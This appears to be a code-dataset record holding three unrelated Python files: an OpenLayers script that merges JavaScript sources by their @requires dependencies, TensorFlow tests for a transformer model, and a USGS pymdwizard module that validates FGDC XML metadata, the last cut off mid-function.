mergejs.py
|
tmcw/OpenLayerer
|
44212b0f9a8aae71f6f96f6357671e89f6ea6cc5
|
[
"Apache-2.0",
"BSD-2-Clause"
] | 1
|
2015-07-17T19:01:07.000Z
|
2015-07-17T19:01:07.000Z
|
mergejs.py
|
tmcw/OpenLayerer
|
44212b0f9a8aae71f6f96f6357671e89f6ea6cc5
|
[
"Apache-2.0",
"BSD-2-Clause"
] | null | null | null |
mergejs.py
|
tmcw/OpenLayerer
|
44212b0f9a8aae71f6f96f6357671e89f6ea6cc5
|
[
"Apache-2.0",
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/env python
#
# Merge multiple JavaScript source code files into one.
#
# Usage:
# This script requires source files to have dependencies specified in them.
#
# Dependencies are specified with a comment of the form:
#
# // @requires <file path>
#
# e.g.
#
# // @requires Geo/DataSource.js
#
# This script should be executed like so:
#
# mergejs.py <output.js> <directory> [...]
#
# e.g.
#
# mergejs.py openlayers.js Geo/ CrossBrowser/
#
# This example will cause the script to walk the `Geo` and
# `CrossBrowser` directories--and subdirectories thereof--and import
# all `*.js` files encountered. The dependency declarations will be extracted
# and then the source code from imported files will be output to
# a file named `openlayers.js` in an order which fulfils the dependencies
# specified.
#
#
# Note: This is a very rough initial version of this code.
#
# -- Copyright 2005-2008 MetaCarta, Inc. / OpenLayers project --
#
# TODO: Allow files to be excluded. e.g. `Crossbrowser/DebugMode.js`?
# TODO: Report error when dependency can not be found rather than KeyError.
import os, sys
SUFFIX_JAVASCRIPT = ".js"
RE_REQUIRE = "@requires:? (.*)\n" # TODO: Ensure in comment?
def scanjs(sourceDirectory, config = None):
""" scans scanDirectory recursively and returns a list of paths to javascript files
:param sourceDirectory: the directory root
:return list object of all file paths
"""
allFiles = []
## Find all the Javascript source files
for root, dirs, files in os.walk(sourceDirectory):
for filename in files:
if filename.endswith(SUFFIX_JAVASCRIPT) and not filename.startswith("."):
filepath = os.path.join(root, filename)[len(sourceDirectory)+1:]
filepath = filepath.replace("\\", "/")
if config and config.include:
if filepath in config.include or filepath in config.forceFirst:
allFiles.append(filepath)
elif (not config) or (filepath not in config.exclude):
allFiles.append(filepath)
return allFiles
def merge (sourceDirectory, config = None):
""" Merges source files within a given directory according to a configuration
:param sourceDirectory: a string designating the path of the OpenLayers source
:param config: a mergejs.Config object
"""
from toposort import toposort
allFiles = scanjs(sourceDirectory, config)
## Header inserted at the start of each file in the output
HEADER = "/* " + "=" * 70 + "\n %s\n" + " " + "=" * 70 + " */\n\n"
files = {}
## Import file source code
## TODO: Do import when we walk the directories above?
for filepath in allFiles:
fullpath = os.path.join(sourceDirectory, filepath).strip()
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[filepath] = SourceFile(filepath, content) # TODO: Chop path?
complete = False
resolution_pass = 1
while not complete:
order = [] # List of filepaths to output, in a dependency satisfying order
nodes = []
routes = []
## Resolve the dependencies
resolution_pass += 1
for filepath, info in files.items():
nodes.append(filepath)
for neededFilePath in info.requires:
routes.append((neededFilePath, filepath))
for dependencyLevel in toposort(nodes, routes):
for filepath in dependencyLevel:
order.append(filepath)
if not files.has_key(filepath):
fullpath = os.path.join(sourceDirectory, filepath).strip()
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[filepath] = SourceFile(filepath, content) # TODO: Chop path?
# Double check all dependencies have been met
complete = True
try:
for fp in order:
if max([order.index(rfp) for rfp in files[fp].requires] +
[order.index(fp)]) != order.index(fp):
complete = False
except:
complete = False
## Move forced first and last files to the required position
if config:
order = config.forceFirst + [item
for item in order
if ((item not in config.forceFirst) and
(item not in config.forceLast))] + config.forceLast
## Output the files in the determined order
result = []
for fp in order:
f = files[fp]
result.append(HEADER % f.filepath)
source = f.source
result.append(source)
if not source.endswith("\n"):
result.append("\n")
return "".join(result)
if __name__ == "__main__":
from optparse import OptionParser
usage = "usage: mergejs.py <output.js> <source directory> [--config config filename]"
parser = OptionParser(usage=usage)
parser.add_option('-c', '--config', dest="config_filename", action="store",
help="Config file name")
(options, args) = parser.parse_args()
try:
        outputFilename = args[0]
        sourceDirectory = args[1]
except IndexError:
parser.print_help()
sys.exit()
if options.config_filename:
config = Config()
config.read(options.config_filename)
else:
config = None
output = merge(sourceDirectory, config)
file(outputFilename, "w").write(output)
| 32.707113
| 102
| 0.612639
|
#!/usr/bin/env python
#
# Merge multiple JavaScript source code files into one.
#
# Usage:
# This script requires source files to have dependencies specified in them.
#
# Dependencies are specified with a comment of the form:
#
# // @requires <file path>
#
# e.g.
#
# // @requires Geo/DataSource.js
#
# This script should be executed like so:
#
# mergejs.py <output.js> <directory> [...]
#
# e.g.
#
# mergejs.py openlayers.js Geo/ CrossBrowser/
#
# This example will cause the script to walk the `Geo` and
# `CrossBrowser` directories--and subdirectories thereof--and import
# all `*.js` files encountered. The dependency declarations will be extracted
# and then the source code from imported files will be output to
# a file named `openlayers.js` in an order which fulfils the dependencies
# specified.
#
#
# Note: This is a very rough initial version of this code.
#
# -- Copyright 2005-2008 MetaCarta, Inc. / OpenLayers project --
#
# TODO: Allow files to be excluded. e.g. `Crossbrowser/DebugMode.js`?
# TODO: Report error when dependency can not be found rather than KeyError.
import re, os, sys
SUFFIX_JAVASCRIPT = ".js"
RE_REQUIRE = "@requires:? (.*)\n" # TODO: Ensure in comment?
class SourceFile:
"""
Represents a Javascript source code file.
"""
def __init__(self, filepath, source):
"""
"""
self.filepath = filepath
self.source = source
self.requiredBy = []
def _getRequirements(self):
"""
Extracts the dependencies specified in the source code and returns
a list of them.
"""
# TODO: Cache?
return re.findall(RE_REQUIRE, self.source)
requires = property(fget=_getRequirements, doc="")
class Config:
"""
Represents a parsed configuration file.
A configuration file should be of the following form:
[first]
3rd/prototype.js
core/application.js
core/params.js
# A comment
[last]
core/api.js # Another comment
[exclude]
3rd/logger.js
All headings are required.
The files listed in the `first` section will be forced to load
*before* all other files (in the order listed). The files in `last`
section will be forced to load *after* all the other files (in the
order listed).
The files list in the `exclude` section will not be imported.
Any text appearing after a # symbol indicates a comment.
"""
def __init__(self, **kwargs):
self.forceFirst = kwargs.get('forceFirst', [])
self.forceLast = kwargs.get('forceLast', [])
self.include = kwargs.get('include', [])
self.exclude = kwargs.get('exclude', [])
def read(self, filename):
"""
Parses the content of the named file and stores the values.
:param filename: the path to a configuration file
:return none
"""
lines = [re.sub("#.*?$", "", line).strip() # Assumes end-of-line character is present
for line in open(filename)
if line.strip() and not line.strip().startswith("#")] # Skip blank lines and comments
self.forceFirst = lines[lines.index("[first]") + 1:lines.index("[last]")]
self.forceLast = lines[lines.index("[last]") + 1:lines.index("[include]")]
self.include = lines[lines.index("[include]") + 1:lines.index("[exclude]")]
self.exclude = lines[lines.index("[exclude]") + 1:]
def scanjs(sourceDirectory, config = None):
""" scans scanDirectory recursively and returns a list of paths to javascript files
:param sourceDirectory: the directory root
:return list object of all file paths
"""
allFiles = []
## Find all the Javascript source files
for root, dirs, files in os.walk(sourceDirectory):
for filename in files:
if filename.endswith(SUFFIX_JAVASCRIPT) and not filename.startswith("."):
filepath = os.path.join(root, filename)[len(sourceDirectory)+1:]
filepath = filepath.replace("\\", "/")
if config and config.include:
if filepath in config.include or filepath in config.forceFirst:
allFiles.append(filepath)
elif (not config) or (filepath not in config.exclude):
allFiles.append(filepath)
return allFiles
def merge (sourceDirectory, config = None):
""" Merges source files within a given directory according to a configuration
:param sourceDirectory: a string designating the path of the OpenLayers source
:param config: a mergejs.Config object
"""
from toposort import toposort
allFiles = scanjs(sourceDirectory, config)
## Header inserted at the start of each file in the output
HEADER = "/* " + "=" * 70 + "\n %s\n" + " " + "=" * 70 + " */\n\n"
files = {}
## Import file source code
## TODO: Do import when we walk the directories above?
for filepath in allFiles:
fullpath = os.path.join(sourceDirectory, filepath).strip()
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[filepath] = SourceFile(filepath, content) # TODO: Chop path?
complete = False
resolution_pass = 1
while not complete:
order = [] # List of filepaths to output, in a dependency satisfying order
nodes = []
routes = []
## Resolve the dependencies
resolution_pass += 1
for filepath, info in files.items():
nodes.append(filepath)
for neededFilePath in info.requires:
routes.append((neededFilePath, filepath))
for dependencyLevel in toposort(nodes, routes):
for filepath in dependencyLevel:
order.append(filepath)
if not files.has_key(filepath):
fullpath = os.path.join(sourceDirectory, filepath).strip()
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[filepath] = SourceFile(filepath, content) # TODO: Chop path?
# Double check all dependencies have been met
complete = True
try:
for fp in order:
if max([order.index(rfp) for rfp in files[fp].requires] +
[order.index(fp)]) != order.index(fp):
complete = False
except:
complete = False
## Move forced first and last files to the required position
if config:
order = config.forceFirst + [item
for item in order
if ((item not in config.forceFirst) and
(item not in config.forceLast))] + config.forceLast
## Output the files in the determined order
result = []
for fp in order:
f = files[fp]
result.append(HEADER % f.filepath)
source = f.source
result.append(source)
if not source.endswith("\n"):
result.append("\n")
return "".join(result)
if __name__ == "__main__":
from optparse import OptionParser
usage = "usage: mergejs.py <output.js> <source directory> [--config config filename]"
parser = OptionParser(usage=usage)
parser.add_option('-c', '--config', dest="config_filename", action="store",
help="Config file name")
(options, args) = parser.parse_args()
try:
        outputFilename = args[0]
        sourceDirectory = args[1]
except IndexError:
parser.print_help()
sys.exit()
if options.config_filename:
config = Config()
config.read(options.config_filename)
else:
config = None
output = merge(sourceDirectory, config)
file(outputFilename, "w").write(output)
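
A small illustration of the `@requires` extraction described in the header and used by `SourceFile` (the JavaScript snippet is fabricated for the example):

# Demo of the dependency pattern; sample_js is a made-up source string.
sample_js = "// @requires Geo/DataSource.js\n// @requires CrossBrowser/Log.js\nvar x = 1;\n"
print(re.findall(RE_REQUIRE, sample_js))  # ['Geo/DataSource.js', 'CrossBrowser/Log.js']
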
| 0
| 0
| 0
| 2,220
| 0
| 0
| 0
| 4
| 46
|
37506a8286c5b05402cb22c60eb6b8354ead4f28
| 5,955
|
py
|
Python
|
test/core/dnn/transformer_test.py
|
ClaudioBorges/ehrudite
|
8633995d3bf795fffeccabd7d20be522241f3bb5
|
[
"Apache-2.0"
] | null | null | null |
test/core/dnn/transformer_test.py
|
ClaudioBorges/ehrudite
|
8633995d3bf795fffeccabd7d20be522241f3bb5
|
[
"Apache-2.0"
] | null | null | null |
test/core/dnn/transformer_test.py
|
ClaudioBorges/ehrudite
|
8633995d3bf795fffeccabd7d20be522241f3bb5
|
[
"Apache-2.0"
] | 1
|
2022-03-18T09:26:05.000Z
|
2022-03-18T09:26:05.000Z
|
"""The test file for transformer DNN"""
import ehrudite.core.dnn.transformer as transformer
| 34.224138
| 87
| 0.674559
|
"""The test file for transformer DNN"""
import ehrudite.core.dnn.transformer as transformer
import random
import tensorflow as tf
def test_transformer_encoder_decoder_layer():
batch_size = random.randint(8, 64)
d_model = 2 ** random.randint(7, 9)
dff = random.randint(512, 2048)
input_seq_len = random.randint(40, 50)
target_seq_len = random.randint(10, 30)
num_heads = 2 ** random.randint(1, 4)
encoder_layer = transformer.EncoderLayer(d_model, num_heads, dff)
encoder_layer_output = encoder_layer(
tf.random.uniform((batch_size, input_seq_len, d_model)), False, None
)
assert (batch_size, input_seq_len, d_model) == encoder_layer_output.shape
decoder_layer = transformer.DecoderLayer(d_model, num_heads, dff)
decoder_layer_output, _, _ = decoder_layer(
tf.random.uniform((batch_size, target_seq_len, d_model)),
encoder_layer_output,
False,
None,
None,
)
assert (batch_size, target_seq_len, d_model) == decoder_layer_output.shape
def test_transformer_encoder_decoder():
batch_size = random.randint(8, 64)
d_model = 2 ** random.randint(7, 9)
dff = random.randint(512, 2048)
input_seq_len = random.randint(40, 50)
input_vocab_size = random.randint(1000, 10000)
maximum_position_encoding = random.randint(1024, 4096)
num_heads = 2 ** random.randint(1, 4)
num_layers = random.randint(2, 4)
target_seq_len = random.randint(10, 30)
target_vocab_size = random.randint(1000, 10000)
encoder = transformer.Encoder(
num_layers=num_layers,
d_model=d_model,
num_heads=num_heads,
dff=dff,
input_vocab_size=input_vocab_size,
maximum_position_encoding=maximum_position_encoding,
)
temp_input = tf.random.uniform(
(batch_size, input_seq_len), dtype=tf.int64, minval=0, maxval=200
)
encoder_output = encoder(temp_input, training=False, mask=None)
assert encoder_output.shape == (batch_size, input_seq_len, d_model)
decoder = transformer.Decoder(
num_layers=num_layers,
d_model=d_model,
num_heads=num_heads,
dff=dff,
target_vocab_size=target_vocab_size,
maximum_position_encoding=maximum_position_encoding,
)
temp_input = tf.random.uniform(
(batch_size, target_seq_len), dtype=tf.int64, minval=0, maxval=200
)
output, attn = decoder(
temp_input,
enc_output=encoder_output,
training=False,
look_ahead_mask=None,
padding_mask=None,
)
assert output.shape == (batch_size, target_seq_len, d_model)
assert len(attn.keys()) == 2
def test_transformer_positional_encoding():
maximum_position_encoding = random.randint(1024, 4096)
d_model = 2 ** random.randint(7, 9)
pos_encoding = transformer._positional_encoding(maximum_position_encoding, d_model)
assert pos_encoding.shape == (1, maximum_position_encoding, d_model)
def test_transformer_scaled_dot_product_attention():
# Both K and V penultimate dimension must match
    # Both K and Q leading dimension must match
temp_k = tf.constant(
[[10, 0, 0], [0, 10, 0], [0, 0, 10], [0, 0, 10]], dtype=tf.float32
) # (4, 3)
temp_v = tf.constant(
[[1, 0], [10, 0], [100, 5], [1000, 6]], dtype=tf.float32
) # (4, 2)
# This `query` aligns with the second `key`,
# so the second `value` is returned.
temp_q = tf.constant([[0, 10, 0]], dtype=tf.float32) # (1, 3)
temp_out, temp_attn = transformer.scaled_dot_product_attention(
temp_q, temp_k, temp_v, None
)
assert temp_attn.shape == (temp_q.shape[0], temp_v.shape[0])
assert temp_out.shape == (temp_q.shape[0], temp_v.shape[1])
temp_q = tf.constant(
[[0, 0, 10], [0, 10, 0], [10, 10, 0]], dtype=tf.float32
) # (3, 3)
temp_out, temp_attn = transformer.scaled_dot_product_attention(
temp_q, temp_k, temp_v, None
)
assert temp_attn.shape == (temp_q.shape[0], temp_v.shape[0])
assert temp_out.shape == (temp_q.shape[0], temp_v.shape[1])
def test_multi_head_attention():
batch_size = random.randint(8, 64)
d_model = 2 ** random.randint(7, 9)
encoder_sequence = random.randint(50, 100)
num_heads = 2 ** random.randint(1, 4)
temp_mha = transformer.MultiHeadAttention(d_model=d_model, num_heads=num_heads)
y = tf.random.uniform(
(batch_size, encoder_sequence, d_model)
) # (batch_size, encoder_sequence, d_model)
out, attn = temp_mha(y, k=y, q=y, mask=None)
assert out.shape == y.shape
assert attn.shape == (y.shape[0], num_heads, y.shape[1], y.shape[1])
def test_transformer_model():
batch_size = random.randint(8, 64)
d_model = 2 ** random.randint(7, 9)
dff = random.randint(512, 2048)
input_seq_len = random.randint(40, 50)
input_vocab_size = random.randint(1000, 10000)
num_heads = 2 ** random.randint(1, 4)
num_layers = random.randint(2, 4)
target_seq_len = random.randint(10, 30)
target_vocab_size = random.randint(1000, 10000)
sample_transformer = transformer.Transformer(
num_layers=num_layers,
d_model=d_model,
num_heads=num_heads,
dff=dff,
input_vocab_size=input_vocab_size,
target_vocab_size=target_vocab_size,
pe_input=random.randint(5000, 10000),
pe_target=random.randint(2000, 4000),
)
temp_input = tf.random.uniform(
(batch_size, input_seq_len), dtype=tf.int64, minval=0, maxval=200
)
temp_target = tf.random.uniform(
(batch_size, target_seq_len), dtype=tf.int64, minval=0, maxval=200
)
fn_out, _ = sample_transformer([temp_input, temp_target], training=False)
assert fn_out.shape == (batch_size, target_seq_len, target_vocab_size)
def test_optimizer():
d_model = 2 ** random.randint(7, 9)
optimizer = transformer.optimizer(d_model)
assert optimizer is not None
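
For reference, the quantity exercised by test_transformer_scaled_dot_product_attention is standard scaled dot-product attention, softmax(Q K^T / sqrt(d_k)) V. The sketch below is a plain-NumPy restatement of that textbook formula, not code taken from ehrudite's implementation; it reproduces the "second key selects the second value" behaviour noted in the comment above.

import numpy as np

def reference_attention(q, k, v):
    # Textbook formula; shapes follow the test above: q (m, d), k (n, d), v (n, dv).
    logits = q @ k.T / np.sqrt(k.shape[-1])
    weights = np.exp(logits - logits.max(axis=-1, keepdims=True))
    weights = weights / weights.sum(axis=-1, keepdims=True)
    return weights @ v, weights
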
| 0
| 0
| 0
| 0
| 0
| 5,656
| 0
| -6
| 205
|
8e54067c74c3efbad693b3983718ac2e603e8a34
| 9,858
|
py
|
Python
|
pymdwizard/core/fgdc_utils.py
|
mmfink/fort-pymdwizard
|
96f46e8cc2594b82b475b4f3fcae96a05ebc03e4
|
[
"CC-BY-4.0"
] | 53
|
2017-05-01T05:03:33.000Z
|
2022-03-13T04:49:15.000Z
|
pymdwizard/core/fgdc_utils.py
|
mmfink/fort-pymdwizard
|
96f46e8cc2594b82b475b4f3fcae96a05ebc03e4
|
[
"CC-BY-4.0"
] | 109
|
2017-05-17T15:15:40.000Z
|
2022-03-24T21:12:45.000Z
|
pymdwizard/core/fgdc_utils.py
|
mmfink/fort-pymdwizard
|
96f46e8cc2594b82b475b4f3fcae96a05ebc03e4
|
[
"CC-BY-4.0"
] | 17
|
2017-02-08T16:18:18.000Z
|
2021-01-28T19:38:09.000Z
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
"""
The MetadataWizard(pymdwizard) software was developed by the
U.S. Geological Survey Fort Collins Science Center.
See: https://github.com/usgs/fort-pymdwizard for current project source code
See: https://usgs.github.io/fort-pymdwizard/ for current user documentation
See: https://github.com/usgs/fort-pymdwizard/tree/master/examples
for examples of use in other scripts
License: Creative Commons Attribution 4.0 International (CC BY 4.0)
http://creativecommons.org/licenses/by/4.0/
PURPOSE
------------------------------------------------------------------------------
Module contains utility functions for interacting with XML FGDC records
SCRIPT DEPENDENCIES
------------------------------------------------------------------------------
This script is part of the pymdwizard package and is not intended to be
used independently. All pymdwizard package requirements are needed.
See imports section for external packages used in this script as well as
inter-package dependencies
U.S. GEOLOGICAL SURVEY DISCLAIMER
------------------------------------------------------------------------------
This software has been approved for release by the U.S. Geological Survey
(USGS). Although the software has been subjected to rigorous review,
the USGS reserves the right to update the software as needed pursuant to
further analysis and review. No warranty, expressed or implied, is made by
the USGS or the U.S. Government as to the functionality of the software and
related material nor shall the fact of release constitute any such warranty.
Furthermore, the software is released on condition that neither the USGS nor
the U.S. Government shall be held liable for any damages resulting from
its authorized or unauthorized use.
Any use of trade, product or firm names is for descriptive purposes only and
does not imply endorsement by the U.S. Geological Survey.
Although this information product, for the most part, is in the public domain,
it also contains copyrighted material as noted in the text. Permission to
reproduce copyrighted items for other than personal use must be secured from
the copyright owner.
------------------------------------------------------------------------------
"""
import json
from dateutil import parser
import defusedxml.lxml as lxml
import pandas as pd
from pymdwizard.core import xml_utils
from pymdwizard.core import utils
from collections import OrderedDict
FGDC_XSD_NAME = "FGDC/fgdc-std-001-1998-annotated.xsd"
BDP_XSD_NAME = "FGDC/BDPfgdc-std-001-1998-annotated.xsd"
def validate_xml(xml, xsl_fname="fgdc", as_dataframe=False):
"""
Parameters
----------
xml : lxml document
or
filename
or
string containing xml representation
xsl_fname : str (optional)
can be one of:
'fgdc' - uses the standard fgdc schema
../resources/FGDC/fgdc-std-001-1998-annotated.xsd
'bdp' = use the Biological Data profile schema,
../resources/FGDC/BDPfgdc-std-001-1998-annotated.xsd
full file path to another local schema.
if not specified defaults to 'fgdc'
as_dataframe : bool
used to specify return format (list of tuples or dataframe)
Returns
-------
list of tuples
(xpath, error message, line number)
or
pandas dataframe
"""
if xsl_fname.lower() == "fgdc":
xsl_fname = utils.get_resource_path(FGDC_XSD_NAME)
elif xsl_fname.lower() == "bdp":
xsl_fname = utils.get_resource_path(BDP_XSD_NAME)
else:
xsl_fname = xsl_fname
xmlschema = xml_utils.load_schema(xsl_fname)
xml_doc = xml_utils.xml_document_loader(xml)
xml_str = xml_utils.node_to_string(xml_doc)
tree_node = xml_utils.string_to_node(xml_str.encode("utf-8"))
lxml._etree._ElementTree(tree_node)
errors = []
srcciteas = []
src_xpath = "dataqual/lineage/srcinfo/srccitea"
src_nodes = tree_node.xpath(src_xpath)
for i, src in enumerate(src_nodes):
srcciteas.append(src.text)
if src.text is None:
if len(src_nodes) == 1:
errors.append(
(
"metadata/" + src_xpath,
"source citation abbreviation cannot be empty",
1,
)
)
else:
xpath = "metadata/dataqual/lineage/srcinfo[{}]/srccitea"
errors.append(
(
xpath.format(i + 1),
"source citation abbreviation cannot be empty",
1,
)
)
procstep_xpath = "dataqual/lineage/procstep"
procstep_nodes = tree_node.xpath(procstep_xpath)
for proc_i, proc in enumerate(procstep_nodes):
srcprod_nodes = proc.xpath("srcprod")
for srcprod_i, srcprod in enumerate(srcprod_nodes):
srcciteas.append(srcprod.text)
if srcprod.text is None:
error_xpath = procstep_xpath
if len(procstep_nodes) > 1:
error_xpath += "[{}]".format(proc_i + 1)
error_xpath += "/srcprod"
if len(srcprod_nodes) > 1:
error_xpath += "[{}]".format(proc_i + 1)
errors.append(
(
"metadata/" + error_xpath,
"source produced abbreviation cannot be empty",
1,
)
)
srcused_xpath = "dataqual/lineage/procstep/srcused"
srcused_nodes = tree_node.xpath(srcused_xpath)
for i, src in enumerate(srcused_nodes):
if src.text not in srcciteas:
if len(srcused_nodes) == 1:
errors.append(
(
"metadata/" + srcused_xpath,
"Source Used Citation Abbreviation {} "
"not found in Source inputs "
"used".format(src.text),
1,
)
)
else:
xpath = "metadata/dataqual/lineage/procstep[{}]/srcused"
errors.append(
(
xpath.format(i + 1),
"Source Used Citation Abbreviation {} "
"not found in Source inputs "
"used".format(src.text),
1,
)
)
if xmlschema.validate(tree_node) and not errors:
return []
line_lookup = dict(
[
(e.sourceline, tree_node.getroottree().getpath(e))
for e in tree_node.xpath(".//*")
]
)
sourceline = tree_node.sourceline
line_lookup[sourceline] = tree_node.getroottree().getpath(tree_node)
fgdc_lookup = get_fgdc_lookup()
for error in xmlschema.error_log:
error_msg = clean_error_message(error.message, fgdc_lookup)
try:
errors.append((line_lookup[error.line][1:], error_msg, error.line))
except KeyError:
errors.append(("Unknown", error_msg, error.line))
errors = list(OrderedDict.fromkeys(errors))
if as_dataframe:
cols = ["xpath", "message", "line number"]
return pd.DataFrame.from_records(errors, columns=cols)
else:
return errors
def get_fgdc_lookup():
"""
Loads the local resource, 'bdp_lookup' into a json object
Returns
-------
json fgdc item lookup
"""
annotation_lookup_fname = utils.get_resource_path("FGDC/bdp_lookup")
try:
with open(annotation_lookup_fname, encoding="utf-8") as data_file:
annotation_lookup = json.loads(data_file.read())
except TypeError:
with open(annotation_lookup_fname) as data_file:
annotation_lookup = json.loads(data_file.read())
return annotation_lookup
def clean_error_message(message, fgdc_lookup=None):
"""
Returns a cleaned up, more informative translation
of a raw xml schema error message.
Empty or missing elements are described in plain English
Parameters
----------
message : str
The raw message we will be cleaning up
Returns
-------
str : cleaned up error message
"""
parts = message.split()
if "Missing child element" in message:
clean_message = "The {} is missing the expected element(s) '{}'"
        clean_message = clean_message.format(parts[1][:-1], parts[-2])
elif (
r"' is not accepted by the pattern '\s*\S(.|\n|\r)*'" in message
or "'' is not a valid value of the atomic type" in message
):
shortname = parts[1][:-1].replace("'", "")
try:
longname = fgdc_lookup[shortname]["long_name"]
except (KeyError, TypeError):
longname = None
if longname is None:
name = shortname
else:
name = "{} ({})".format(longname, shortname)
clean_message = "The value for {} cannot be empty"
clean_message = clean_message.format(name)
else:
clean_message = message
return clean_message
def format_date(date_input):
"""
Convert a Python date object into an FGDC string format YYYYMMDD
Parameters
----------
date_input : str or datetime
if str provided must be in format that dateutil's parser can handle
Returns
-------
    str : date formatted in FGDC YYYYMMDD format
"""
if type(date_input) == str:
date_input = parser.parse(date_input)
return date_input.strftime("%Y%m%d")
| 33.993103
| 79
| 0.582674
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
"""
The MetadataWizard(pymdwizard) software was developed by the
U.S. Geological Survey Fort Collins Science Center.
See: https://github.com/usgs/fort-pymdwizard for current project source code
See: https://usgs.github.io/fort-pymdwizard/ for current user documentation
See: https://github.com/usgs/fort-pymdwizard/tree/master/examples
for examples of use in other scripts
License: Creative Commons Attribution 4.0 International (CC BY 4.0)
http://creativecommons.org/licenses/by/4.0/
PURPOSE
------------------------------------------------------------------------------
Module contains utility functions for interacting with XML FGDC records
SCRIPT DEPENDENCIES
------------------------------------------------------------------------------
This script is part of the pymdwizard package and is not intended to be
used independently. All pymdwizard package requirements are needed.
See imports section for external packages used in this script as well as
inter-package dependencies
U.S. GEOLOGICAL SURVEY DISCLAIMER
------------------------------------------------------------------------------
This software has been approved for release by the U.S. Geological Survey
(USGS). Although the software has been subjected to rigorous review,
the USGS reserves the right to update the software as needed pursuant to
further analysis and review. No warranty, expressed or implied, is made by
the USGS or the U.S. Government as to the functionality of the software and
related material nor shall the fact of release constitute any such warranty.
Furthermore, the software is released on condition that neither the USGS nor
the U.S. Government shall be held liable for any damages resulting from
its authorized or unauthorized use.
Any use of trade, product or firm names is for descriptive purposes only and
does not imply endorsement by the U.S. Geological Survey.
Although this information product, for the most part, is in the public domain,
it also contains copyrighted material as noted in the text. Permission to
reproduce copyrighted items for other than personal use must be secured from
the copyright owner.
------------------------------------------------------------------------------
"""
import json
from dateutil import parser
import defusedxml.lxml as lxml
import pandas as pd
from pymdwizard.core import xml_utils
from pymdwizard.core import utils
from collections import OrderedDict
FGDC_XSD_NAME = "FGDC/fgdc-std-001-1998-annotated.xsd"
BDP_XSD_NAME = "FGDC/BDPfgdc-std-001-1998-annotated.xsd"
def validate_xml(xml, xsl_fname="fgdc", as_dataframe=False):
"""
Parameters
----------
xml : lxml document
or
filename
or
string containing xml representation
xsl_fname : str (optional)
can be one of:
'fgdc' - uses the standard fgdc schema
../resources/FGDC/fgdc-std-001-1998-annotated.xsd
'bdp' = use the Biological Data profile schema,
../resources/FGDC/BDPfgdc-std-001-1998-annotated.xsd
full file path to another local schema.
if not specified defaults to 'fgdc'
as_dataframe : bool
used to specify return format (list of tuples or dataframe)
Returns
-------
list of tuples
(xpath, error message, line number)
or
pandas dataframe
"""
if xsl_fname.lower() == "fgdc":
xsl_fname = utils.get_resource_path(FGDC_XSD_NAME)
elif xsl_fname.lower() == "bdp":
xsl_fname = utils.get_resource_path(BDP_XSD_NAME)
else:
xsl_fname = xsl_fname
xmlschema = xml_utils.load_schema(xsl_fname)
xml_doc = xml_utils.xml_document_loader(xml)
xml_str = xml_utils.node_to_string(xml_doc)
tree_node = xml_utils.string_to_node(xml_str.encode("utf-8"))
lxml._etree._ElementTree(tree_node)
errors = []
srcciteas = []
src_xpath = "dataqual/lineage/srcinfo/srccitea"
src_nodes = tree_node.xpath(src_xpath)
for i, src in enumerate(src_nodes):
srcciteas.append(src.text)
if src.text is None:
if len(src_nodes) == 1:
errors.append(
(
"metadata/" + src_xpath,
"source citation abbreviation cannot be empty",
1,
)
)
else:
xpath = "metadata/dataqual/lineage/srcinfo[{}]/srccitea"
errors.append(
(
xpath.format(i + 1),
"source citation abbreviation cannot be empty",
1,
)
)
procstep_xpath = "dataqual/lineage/procstep"
procstep_nodes = tree_node.xpath(procstep_xpath)
for proc_i, proc in enumerate(procstep_nodes):
srcprod_nodes = proc.xpath("srcprod")
for srcprod_i, srcprod in enumerate(srcprod_nodes):
srcciteas.append(srcprod.text)
if srcprod.text is None:
error_xpath = procstep_xpath
if len(procstep_nodes) > 1:
error_xpath += "[{}]".format(proc_i + 1)
error_xpath += "/srcprod"
if len(srcprod_nodes) > 1:
error_xpath += "[{}]".format(proc_i + 1)
errors.append(
(
"metadata/" + error_xpath,
"source produced abbreviation cannot be empty",
1,
)
)
srcused_xpath = "dataqual/lineage/procstep/srcused"
srcused_nodes = tree_node.xpath(srcused_xpath)
for i, src in enumerate(srcused_nodes):
if src.text not in srcciteas:
if len(srcused_nodes) == 1:
errors.append(
(
"metadata/" + srcused_xpath,
"Source Used Citation Abbreviation {} "
"not found in Source inputs "
"used".format(src.text),
1,
)
)
else:
xpath = "metadata/dataqual/lineage/procstep[{}]/srcused"
errors.append(
(
xpath.format(i + 1),
"Source Used Citation Abbreviation {} "
"not found in Source inputs "
"used".format(src.text),
1,
)
)
if xmlschema.validate(tree_node) and not errors:
return []
line_lookup = dict(
[
(e.sourceline, tree_node.getroottree().getpath(e))
for e in tree_node.xpath(".//*")
]
)
sourceline = tree_node.sourceline
line_lookup[sourceline] = tree_node.getroottree().getpath(tree_node)
fgdc_lookup = get_fgdc_lookup()
for error in xmlschema.error_log:
error_msg = clean_error_message(error.message, fgdc_lookup)
try:
errors.append((line_lookup[error.line][1:], error_msg, error.line))
except KeyError:
errors.append(("Unknown", error_msg, error.line))
errors = list(OrderedDict.fromkeys(errors))
if as_dataframe:
cols = ["xpath", "message", "line number"]
return pd.DataFrame.from_records(errors, columns=cols)
else:
return errors
def get_fgdc_lookup():
"""
Loads the local resource, 'bdp_lookup' into a json object
Returns
-------
json fgdc item lookup
"""
annotation_lookup_fname = utils.get_resource_path("FGDC/bdp_lookup")
try:
with open(annotation_lookup_fname, encoding="utf-8") as data_file:
annotation_lookup = json.loads(data_file.read())
except TypeError:
with open(annotation_lookup_fname) as data_file:
annotation_lookup = json.loads(data_file.read())
return annotation_lookup
def clean_error_message(message, fgdc_lookup=None):
"""
Returns a cleaned up, more informative translation
of a raw xml schema error message.
Empty or missing elements are described in plain English
Parameters
----------
message : str
The raw message we will be cleaning up
Returns
-------
str : cleaned up error message
"""
parts = message.split()
if "Missing child element" in message:
clean_message = "The {} is missing the expected element(s) '{}'"
        clean_message = clean_message.format(parts[1][:-1], parts[-2])
elif (
r"' is not accepted by the pattern '\s*\S(.|\n|\r)*'" in message
or "'' is not a valid value of the atomic type" in message
):
shortname = parts[1][:-1].replace("'", "")
try:
longname = fgdc_lookup[shortname]["long_name"]
except (KeyError, TypeError):
longname = None
if longname is None:
name = shortname
else:
